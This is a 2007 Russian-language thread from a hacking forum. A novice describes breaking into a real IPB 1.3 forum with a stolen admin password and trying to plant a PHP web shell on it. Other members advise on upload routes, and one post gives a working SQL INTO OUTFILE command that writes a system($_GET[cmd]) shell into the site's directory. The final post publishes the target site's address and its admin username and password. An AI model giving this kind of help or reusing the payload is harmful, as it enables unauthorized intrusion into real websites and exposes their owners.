HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Ошибка с шеллом в Ipb 1.3
  #1  
Старый 08.08.2007, 18:37
SUBJECT617
Познающий
Регистрация: 06.08.2007
Сообщений: 85
С нами: 9875274

Репутация: 91
Question Ошибка с шеллом в Ipb 1.3

Вот, получил пароль админа, залил шелл через смайлы потом если через /forum/html/emoticons/antichatl.php перехожу то меня перекидывает на http://err.agava.ru/vh/cgierr/17/

Испровобал 2 шелла nts21Viev.php кажется такое еще...

Что мне делать? Как мне быть?
 
Ответить с цитированием

  #2  
Старый 08.08.2007, 18:50
LEE_ROY
Постоянный
Регистрация: 09.11.2006
Сообщений: 639
С нами: 10265091

Репутация: 541


По умолчанию

Цитата:
залил шелл через смайлы
с чего ты взял, что ты его залил?
 
Ответить с цитированием

  #3  
Старый 08.08.2007, 18:57
SUBJECT617
Познающий
Регистрация: 06.08.2007
Сообщений: 85
С нами: 9875274

Репутация: 91
По умолчанию

Цитата:
Сообщение от LEE_ROY  
с чего ты взял, что ты его залил?
Ну да ну да... Не пинайте меня, я ведь новичек совсем, надо ведь чему то учиться?) А так я решил так как не было The uploading failed как было во всех предыдущих форумах...



Не могу в MySQL найти никак, можете подсказать где именно? (phtml)

Последний раз редактировалось SUBJECT617; 08.08.2007 в 19:22..
 
Ответить с цитированием

  #4  
Старый 08.08.2007, 21:17
SUBJECT617
Познающий
Регистрация: 06.08.2007
Сообщений: 85
С нами: 9875274

Репутация: 91
По умолчанию

В настройках нет атачей, так что я не могу прописать application/octet-stream и phtml

Через смайлы выходит что ничего не добавляется

Добавления настроек там вообще нет..

Просмотрел все темы про заливку шелла но ни один не подошел...

Потому собственно и спрашиваю...(

ЗЫ Замена HTML шаблона не проходит тоже...(
 
Ответить с цитированием

  #5  
Старый 08.08.2007, 22:11
maxster
Участник форума
Регистрация: 27.10.2006
Сообщений: 205
С нами: 10282956

Репутация: 380
По умолчанию

Значит плохо искал, в ипб 1.* есть способ заливки через MySQL, поищи яуже не раз писал про этот метод
 
Ответить с цитированием

  #6  
Старый 09.08.2007, 11:23
SUBJECT617
Познающий
Регистрация: 06.08.2007
Сообщений: 85
С нами: 9875274

Репутация: 91
По умолчанию

Почему то когда пытался залить в папку uploads вывалило
Access denied for user: 'anabole8_admbd@localhost' (Using password: YES)

Как от этого избавиться?

Команда была такой:
SELECT '<?php system($_GET[cmd]); ?>' FROM mysql.user INTO OUTFILE '/home/anabole8/public_html/forum/uploads/shell.php'
 
Ответить с цитированием

  #7  
Старый 09.08.2007, 11:24
n1†R0x
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
С нами: 10160966

Репутация: 1719


По умолчанию

Лучше попытайся залить в папку с аватарками, на заливку в /uploads/ у тебя может быть нет прав.

аа, ты через скуль заливал... скорее всего и правда прав на инто+аутфайл нету.

Последний раз редактировалось n1†R0x; 09.08.2007 в 11:28..
 
Ответить с цитированием

  #8  
Старый 09.08.2007, 11:26
groundhog
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
С нами: 9999746

Репутация: 1318


По умолчанию

Это означает, что пользователь anabole8_admbd не имеет доступа в системную таблицу mysql или прав на исполнение команды OUTFILE. Скорее всего второе.
 
Ответить с цитированием

  #9  
Старый 09.08.2007, 11:38
blackybr
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
С нами: 10516826

Репутация: 3742


По умолчанию

селекти из таблицы форума любой. Утебя нет прав на системные тадлицы. т.е. твой юзер не является рутовым,что обычно нужно для Mysql.user
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
 
Ответить с цитированием

  #10  
Старый 09.08.2007, 11:44
SUBJECT617
Познающий
Регистрация: 06.08.2007
Сообщений: 85
С нами: 9875274

Репутация: 91
По умолчанию

Ну тогда выходит залить шелл на этот форум нереально?
Ну тогда сами посмотрите если хотите... www.anabolex.ru/forum admin : yehakqag Буду другие форумы значит искать((
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ошибки Windows 2 SVipeR Windows 9 02.03.2009 19:28
скрипт распознавания форума genom-- Уязвимости CMS / форумов 22 31.12.2008 15:06
Ошибки Windows dinar_007 Windows 19 01.07.2007 13:32
Bsod. [Причины/Решения] rijy Windows 15 23.04.2007 21:13



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.